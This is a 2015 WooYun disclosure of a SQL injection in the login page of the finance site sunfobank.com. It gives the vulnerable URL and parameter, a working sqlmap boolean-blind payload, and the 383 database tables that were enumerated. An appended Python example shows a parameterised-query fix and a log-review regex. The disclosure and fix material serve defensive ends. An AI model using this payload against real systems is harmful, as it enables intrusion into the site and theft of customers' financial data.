
Vulnerability summary

Defect ID: wooyun-2015-0134630

Title: P2P security: SQL injection in Sunfobank (新富金融) (large-scale user information leak)

Vendor: sunfobank.com

Author: 路人甲 (anonymous)

Submitted: 2015-08-18 13:53

Fix deadline: 2015-08-23 13:54

Published: 2015-08-23 13:54

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-18: details sent to the vendor, awaiting the vendor's handling
2015-08-23: the vendor has deliberately ignored the vulnerability; details disclosed to the public

Brief description:

Sunfo Capital Group (新富资本集团) holds a private investment fund manager licence issued by the Asset Management Association of China and brings together professionals from banking, trust, investment and financing, wealth management and internet finance.

Detailed description:

https://www.sunfobank.com/logining.html?paramMap.password=admin&paramMap.code=135791&coverPassword=admin&paramMap.pageId=userlogin&[email protected]


A single SQL injection on the main site exposes a large amount of data: 383 tables.
Place: GET
Parameter: paramMap.email
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: paramMap.password=admin&paramMap.code=135791&coverPassword=admin&paramMap.pageId=userlogin&[email protected]') RLIKE (SELECT (CASE WHEN (8837=8837) THEN 0x61646d696e4061646d696e2e636f6d39393838 ELSE 0x28 END)) AND ('hyoF'='hyoF
---
web application technology: JSP
back-end DBMS: MySQL 5
Database: youyadai
[383 tables]
+-------------------------------------+
| app_token |
| bt_config |
| bt_rights |
| pool_rule |
| repayment_invest |
| smart_account |
| smart_interest_day |
| smart_interest_month |
| smart_interest_week |
| smart_interest_year |
| smart_invest |
| smart_pool |
| smart_repayment |
| smart_transfer_record |
| t_activity |
| t_ad_channel |
| t_admin |
| t_agreement |
| t_agreement_middle |
| t_amend |
| t_apply_paper_contract |
| t_apply_paper_contractlist |
| t_area_bank |
| t_automaticbid |
| t_automaticbid_log |
| t_award |
| t_back_recharge_cost |
| t_bankcard |
| t_bankcard_lists |
| t_banner |
| t_bidrecord |
| t_borrow |
| t_borrow_apply |
| t_borrow_apply_new |
| t_borrow_attr |
| t_borrow_paymentmode |
| t_borrow_status |
| t_borrow_success_list |
| t_borrow_way |
| t_brdetail |
| t_calendar_user |
| t_channel_user |
| t_closenetwork |
| t_collection |
| t_concern |
| t_contract |
| t_cost_manager |
| t_coupon |
| t_credit_invest |
| t_credit_invest_result |
| t_creditbrdetail |
| t_creditinfo |
| t_crediting |
| t_deskcalendar_attr |
| t_download |
| t_education_cost |
| t_event_record |
| t_exchange_code |
| t_excitation |
| t_freeze_detail |
| t_fund_messageboard |
| t_fundrecord |
| t_fundrecord_list |
| t_funds |
| t_group |
| t_group_user |
| t_guarantee_company |
| t_help_answer |
| t_help_question |
| t_help_type |
| t_info_count |
| t_inner_bid_strategy |
| t_integral_trade_money |
| t_intention_fund |
| t_invest |
| t_invest_history |
| t_links |
| t_loan_company |
| t_loans_detail |
| t_mail |
| t_mailset |
| t_market_relation |
| t_market_user_award |
| t_materialimagedetal |
| t_materialsauth |
| t_materialsauthtype |
| t_mediareport |
| t_mer_recharge_detail |
| t_mer_transfer_detail |
| t_mer_withdraw_detail |
| t_message |
| t_messageset |
| t_money |
| t_month_bill |
| t_month_profit_sms |
| t_month_recommend |
| t_msgboard |
| t_news |
| t_notice |
| t_notice_msg |
| t_noticecon |
| t_opinion |
| t_para_config |
| t_person |
| t_person_history |
| t_phone_binding_info |
| t_position |
| t_privileged_user |
| t_prize |
| t_prize_product |
| t_recharge |
| t_recharge_detail |
| t_recharge_info |
| t_recharge_withdraw_info |
| t_recommend_commission |
| t_recommend_detail |
| t_recommend_user |
| t_recommendlevel |
| t_recommendrule |
| t_referral_bonuses |
| t_region |
| t_relation |
| t_repay_detail |
| t_repayment |
| t_repayment_service |
| t_report |
| t_reporting |
| t_reporting_right |
| t_risk_detail |
| t_role |
| t_role_rights |
| t_select |
| t_sendsms |
| t_serviceman |
| t_show_record |
| t_sms |
| t_stock_account |
| t_stock_account_status |
| t_stock_fee |
| t_stock_person |
| t_stock_principal |
| t_stock_profit |
| t_stock_renewal |
| t_success_borrow_details |
| t_success_paying_all_details |
| t_success_paying_details |
| t_successstory |
| t_sysimages |
| t_team |
| t_third_info |
| t_third_user |
| t_tmp_parent_user |
| t_transfer |
| t_unfreeze_detail |
| t_user |
| t_user_check |
| t_user_finance |
| t_user_kefu |
| t_user_person_info |
| t_user_position |
| t_user_recommendrule |
| t_user_recorelist |
| t_user_relation |
| t_user_withdraw_info |
| t_usercard_lists |
| t_userintegraldetail |
| t_vipsum |
| t_withdraw |
| t_workauth |
| test_c3p0 |
| tx |
| user_invest_list_view |
| v_blacklist_list |
| v_integral_trade_user |
| v_inves_borrow_user_index |
| v_marketrelation_user |
| v_queryfundrecordlist |
| v_t_ad_channel |
| v_t_ad_channel_user |
| v_t_admin |
| v_t_agreement_middle_user |
| v_t_amount_record |
| v_t_apply_papar_contract_detail |
| v_t_apply_paper_contractlist |
| v_t_autobid_borrow |
| v_t_autobid_user |
| v_t_automaticbid_user_person |
| v_t_award_user_person |
| v_t_back_recharge_cost_user |
| v_t_backacmount |
| v_t_backacount |
| v_t_bacount_detail |
| v_t_bacount_history_detail |
| v_t_base_check |
| v_t_best_borrow |
| v_t_borrow_collection |
| v_t_borrow_concern |
| v_t_borrow_contract_user_info |
| v_t_borrow_detail |
| v_t_borrow_details |
| v_t_borrow_h |
| v_t_borrow_h_detail |
| v_t_borrow_h_firstaudit |
| v_t_borrow_h_firstaudit_detail |
| v_t_borrow_h_flowmark |
| v_t_borrow_h_flowmark_detail |
| v_t_borrow_h_fullscale |
| v_t_borrow_h_fullscale_detail |
| v_t_borrow_h_tenderin |
| v_t_borrow_h_tenderin_detail |
| v_t_borrow_home_index |
| v_t_borrow_index |
| v_t_borrow_index_copy |
| v_t_borrow_invest |
| v_t_borrow_invest_user |
| v_t_borrow_investrecord |
| v_t_borrow_investrecord_forinternet |
| v_t_borrow_list |
| v_t_borrow_list_for_360 |
| v_t_borrow_list_for_internet |
| v_t_borrow_msgbord |
| v_t_borrow_publish |
| v_t_borrow_repayment |
| v_t_borrow_statis |
| v_t_borrow_user_info |
| v_t_borrow_user_materialsauth |
| v_t_borrow_user_materialsauth_img |
| v_t_callcenter_help_list |
| v_t_channel_user |
| v_t_concern_funds |
| v_t_contract_user |
| v_t_coupon_activity |
| v_t_coupon_detail |
| v_t_credit_invest_detail |
| v_t_creditinfo_detail |
| v_t_creditinfo_index |
| v_t_crediting_apply |
| v_t_crediting_list |
| v_t_criditpicture |
| v_t_customers_list |
| v_t_deskcalendar_user |
| v_t_download_detail |
| v_t_download_list |
| v_t_empl_recommend_profit |
| v_t_exchange_code_coupon |
| v_t_fastpay_bankcard |
| v_t_forpayment_h |
| v_t_forpayment_h_interest |
| v_t_forpayment_h_total |
| v_t_frontshowpicture |
| v_t_fundmessageboard_user |
| v_t_fundrecord_user |
| v_t_funds_admin |
| v_t_funds_intention |
| v_t_group_admin |
| v_t_groupuser_user_person |
| v_t_hasrepay_h |
| v_t_intention_funds_user |
| v_t_intentionfund_user |
| v_t_invest_all |
| v_t_invest_all_week |
| v_t_invest_backacount |
| v_t_invest_backacount_sum |
| v_t_invest_borrow |
| v_t_invest_borrow_list |
| v_t_invest_borrow_query |
| v_t_invest_count |
| v_t_invest_for_credit |
| v_t_invest_forpay_detail |
| v_t_invest_haspay_detail |
| v_t_invest_interest_statis |
| v_t_invest_profit_all |
| v_t_invest_profit_detail |
| v_t_invest_profitrank_detail |
| v_t_invest_rank |
| v_t_invest_rank_detail |
| v_t_invest_rank_week |
| v_t_invest_recycled |
| v_t_invest_recycled_sum |
| v_t_invest_recycling |
| v_t_invest_recycling_sum |
| v_t_invest_statis |
| v_t_invest_statis_copy |
| v_t_invest_user_person |
| v_t_investment |
| v_t_laterepay_h |
| v_t_loans_detail_reconciliation |
| v_t_login_session_verify |
| v_t_login_statis |
| v_t_mail_admin |
| v_t_mail_notify |
| v_t_mail_user |
| v_t_mer_transfer_detailmoney |
| v_t_month_recommend_profit |
| v_t_news_list |
| v_t_newusercheck |
| v_t_next_repay |
| v_t_noshangchuan |
| v_t_overduepayment_h |
| v_t_pasttime |
| v_t_per_picture |
| v_t_person_authentication |
| v_t_personcheck |
| v_t_prize_product_user |
| v_t_prize_user |
| v_t_recommend_profit |
| v_t_recommend_user_invest |
| v_t_recommend_user_list |
| v_t_recommend_user_person |
| v_t_recommend_user_rule |
| v_t_recommend_ziliao_lias |
| v_t_recommendfriend_list |
| v_t_relation_level2 |
| v_t_relation_level3 |
| v_t_relation_level4 |
| v_t_relation_user |
| v_t_repay_detail |
| v_t_repayment_detail |
| v_t_repayment_h |
| v_t_rewardnewuser |
| v_t_risk_detail_h |
| v_t_risk_list_h |
| v_t_role_rights_menu |
| v_t_smart_invest_records |
| v_t_smart_transfer_list |
| v_t_tender |
| v_t_third_user_invest |
| v_t_third_user_invest_tmp |
| v_t_top_ad_borrow_list |
| v_t_transfer_user |
| v_t_user_adminchecklist |
| v_t_user_amountofrecords |
| v_t_user_backrw_lists |
| v_t_user_cash_lists |
| v_t_user_credit_apply_msgas |
| v_t_user_credit_msg |
| v_t_user_credit_msg_agin |
| v_t_user_creditlimit_apply |
| v_t_user_frends |
| v_t_user_frontmeg |
| v_t_user_frontpictur |
| v_t_user_fund_lists |
| v_t_user_fundrecord_lists |
| v_t_user_fundwithdraw_lists |
| v_t_user_invest |
| v_t_user_lock |
| v_t_user_loginsession_user |
| v_t_user_merwithdraw_lists |
| v_t_user_myborrowlist |
| v_t_user_myborrowrecorde |
| v_t_user_newuser |
| v_t_user_person |
| v_t_user_person_bankcard |
| v_t_user_person_service |
| v_t_user_picture |
| v_t_user_picture_base |
| v_t_user_picture_msg |
| v_t_user_picture_select |
| v_t_user_picture_select_2 |
| v_t_user_picture_select_3 |
| v_t_user_rechargedetails_list |
| v_t_user_rechargefirst_lists |
| v_t_user_relation |
| v_t_user_rescher |
| v_t_user_select_credit |
| v_t_user_select_credit_last |
| v_t_user_selectpicture |
| v_t_user_statis |
| v_t_user_stock_account |
| v_t_user_stock_fee |
| v_t_user_stock_primcipal |
| v_t_user_stock_profit |
| v_t_user_stock_renewal |
| v_t_user_successtotalbid_lists |
| v_t_user_transferdetails_list |
| v_t_user_verypictur |
| v_t_user_withdraw_lists |
| v_t_usercard_lists |
| v_t_usermanage_baseinfo |
| v_t_usermanage_baseinfoinner |
| v_t_usermanage_integralinfo |
| v_t_usermanage_integralinner |
| v_t_usermanage_viprecordinfo |
+-------------------------------------+
Taking one of the user tables as a sample, it holds tens of thousands of rows.

(Screenshot: QQ截图20150817092629.png)

Proof of vulnerability:

Test

Fix recommendations:

Test

Copyright notice: when reposting, credit the source 路人甲@乌云
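The report leaves the fix section as a placeholder. As an added example, not code from the original report or from the vendor, the following Python rebuilds the login lookup from the detailed description in two ways against an in-memory SQLite stand-in for the site's MySQL database, and adds a small query-string check for the boolean-blind markers visible in the sqlmap output above. Everything in it is assumed: the table layout and rows, the e-mail values, the function names, and the text of the original JSP login statement, which the page does not show; the redacted e-mail in the page's payload is replaced with a constructed one.

```python
"""Added example (not the report's or the vendor's code): the login lookup
built by string concatenation beside the parameterised form, plus a
request-parameter check for the boolean-blind markers seen on the page."""
import re
import sqlite3
from urllib.parse import parse_qs


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's MySQL database; only the table
    name t_user is taken from the report, the columns are assumed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t_user (id INTEGER PRIMARY KEY, email TEXT, pw_hash TEXT)")
    conn.executemany(
        "INSERT INTO t_user (email, pw_hash) VALUES (?, ?)",
        [("[email protected]", "hash-of-alice"), ("[email protected]", "hash-of-bob")],
    )
    return conn


# Shape of the injected value from the sqlmap output on the page; the leading
# e-mail is a constructed placeholder because the original is redacted.
PAGE_PAYLOAD = (
    "[email protected]') RLIKE (SELECT (CASE WHEN (8837=8837) "
    "THEN 0x61646d696e4061646d696e2e636f6d39393838 ELSE 0x28 END)) AND ('hyoF'='hyoF"
)
# The full query string the report shows, with the same placeholder e-mail.
PAGE_QUERY = (
    "paramMap.password=admin&paramMap.code=135791&coverPassword=admin"
    "&paramMap.pageId=userlogin&paramMap.email=" + PAGE_PAYLOAD
)


def login_sql_unsafe(email: str) -> str:
    """Hypothetical reconstruction of the flawed pattern: the parameter is
    pasted into the statement text, so a quote inside it closes the literal
    and whatever follows is read as SQL."""
    return "SELECT id FROM t_user WHERE (email = '" + email + "')"


def payload_reaches_parser(conn: sqlite3.Connection, email: str) -> bool:
    """True when SQLite rejects the concatenated statement, i.e. the value
    escaped its quoted literal and was parsed as SQL. MySQL, which has RLIKE,
    would instead evaluate the expression; that evaluation is the boolean
    oracle sqmap reported as 'boolean-based blind'."""
    try:
        conn.execute(login_sql_unsafe(email))
    except sqlite3.OperationalError:
        return True
    return False


def find_user_safe(conn: sqlite3.Connection, email: str):
    """Fix: bind the value as a parameter. The driver hands it to the engine
    as data, so it can never alter the statement's structure."""
    return conn.execute("SELECT id FROM t_user WHERE (email = ?)", (email,)).fetchone()


# Markers of the boolean-blind technique in the page's payload: a (R)LIKE or
# CASE WHEN wrapped around a subquery, and the trailing AND ('x'='x tautology.
BLIND_MARKERS = re.compile(
    r"R?LIKE\s*\(\s*SELECT|CASE\s+WHEN\s*\(|AND\s*\('\w+'\s*=\s*'\w+", re.IGNORECASE
)


def flag_suspicious_params(query_string: str) -> list[str]:
    """Names of query-string parameters whose decoded value carries the
    markers above; useful for reviewing access logs for this endpoint."""
    flagged = []
    for name, values in parse_qs(query_string, keep_blank_values=True).items():
        if any(BLIND_MARKERS.search(v) for v in values):
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    db = make_db()
    print("unsafe build, payload parsed as SQL:", payload_reaches_parser(db, PAGE_PAYLOAD))
    print("parameterised lookup of payload:", find_user_safe(db, PAGE_PAYLOAD))
    print("flagged parameters:", flag_suspicious_params(PAGE_QUERY))
```

The parameterised lookup returns no row for the payload because the whole string is compared as an e-mail value, whereas the concatenated build lets the closing quote and the `RLIKE (SELECT ...)` expression reach the SQL parser. The marker check is a log-review aid, not a substitute for the parameterised query; it will miss encodings it does not decode and should be tuned to the endpoint's expected values.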


Vendor response

Vendor reply:

Severity: no impact, vendor ignored

Ignored on: 2015-08-23 13:54

Vendor comment:

Vulnerability rank: 15 (WooYun assessment)

Latest status:

None yet